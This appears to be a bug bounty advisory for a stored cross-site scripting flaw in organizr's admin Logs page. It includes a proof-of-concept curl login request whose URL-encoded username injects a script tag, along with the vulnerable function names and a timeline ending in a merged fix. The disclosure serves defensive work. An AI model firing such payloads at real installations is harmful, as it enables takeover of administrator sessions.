XSS affecting "Logs" Page in causefx/organizr

Valid

Reported on

Apr 5th 2022


Description

A review of organizr's logging system found it is possible for an unauthenticated threat actor to inject arbitrary JavaScript into the "Logs" page found within the administrator dashboard. In a default installation organizr is set to log failed login attempts. In these attempts, the system stores a number of records, one of which is the user supplied username. This username is then returned in the "User" column directly to users with access to the "Logs" table.

Data entered into this logs table is not escaped makin it possible to inject arbitrary JavaScript directly to a user with access to the "Logs" panel. The below curl command can be used to place a payload into the Logs table. After placing the payload login to an account with access to the "Settings" dashboard and open the "Logs" tab. The payload of "alert(2)" will fire.

Additional reviews found the application did not appear to provide any cutoff to the payloads length. Given this, it would be possible for threat actors to place complex and large payloads.

Proof of Concept

// PoC.js
curl 'http://localhost/api/v2/login' -X POST -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'Token: null' -H 'formKey: $2y$10$7DQp3wVaXory9HSag3/qF.P8PULxQXV5kwEnwkCpsp/eZBAaVib4q' -H 'X-Requested-With: XMLHttpRequest' -H 'Origin: http://localhost' -H 'Connection: keep-alive' -H 'Referer: http://localhost/' -H 'Cookie: organizrLanguage=en; organizr_user_uuid=38a2bb5e-3cd6-4156-a8bb-4eed8be6cf36' --data-raw 'loginAttempts=1&tfaCode=&username=%3Cscript%3Ealert(2)%3B%3C%2Fscript%3E&password=asdf&remember=true&oAuth=&oAuthType=&formKey=%242y%2410%247DQp3wVaXory9HSag3%2FqF.P8PULxQXV5kwEnwkCpsp%2FeZBAaVib4q'

A review of orgaizr's code found this vulnerability lies in the logging functions. The "setLoggerChannel()" function calls "setupLogger()" which leverages the user supplied username within the "setTraceId()" call. Prior to passing the username to setTraceId(), the value should be escaped .

Impact

Given that this vulnerability can target high level users, the impact is potentially severe. Leveraging this, a threat actor could create arbitrary users, or make malicious changes to the system.

We are processing your report and will contact the causefx/organizr team within 24 hours. 2 months ago
We have contacted a member of the causefx/organizr team and are waiting to hear back 2 months ago
We have sent a follow up to the causefx/organizr team. We will try again in 7 days. a month ago
causefx validated this vulnerability a month ago
galapag0s has been awarded the disclosure bounty
The fix bounty is now up for grabs
causefx confirmed that a fix has been merged on a42ed9 a month ago
causefx has been awarded the fix bounty
to join this conversation